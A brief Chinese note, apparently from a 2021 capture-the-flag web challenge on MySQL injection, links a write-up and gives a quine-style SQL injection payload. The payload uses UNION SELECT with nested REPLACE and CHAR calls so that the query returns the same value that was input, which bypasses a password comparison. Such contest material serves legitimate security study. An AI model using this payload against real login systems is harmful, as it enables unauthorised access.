绕过查询后的值需要和你输入的值一致

(https://blogbuyi.com/2021/10/10/2021-第五空间智能安全大赛-web-yet_another_mysql_injection/)

payload

1'UNION(SELECT(REPLACE(REPLACE('1"UNION(SELECT(REPLACE(REPLACE("%",CHAR(34),CHAR(39)),CHAR(37),"%")))#',CHAR(34),CHAR(39)),CHAR(37),'1"UNION(SELECT(REPLACE(REPLACE("%",CHAR(34),CHAR(39)),CHAR(37),"%")))#')))#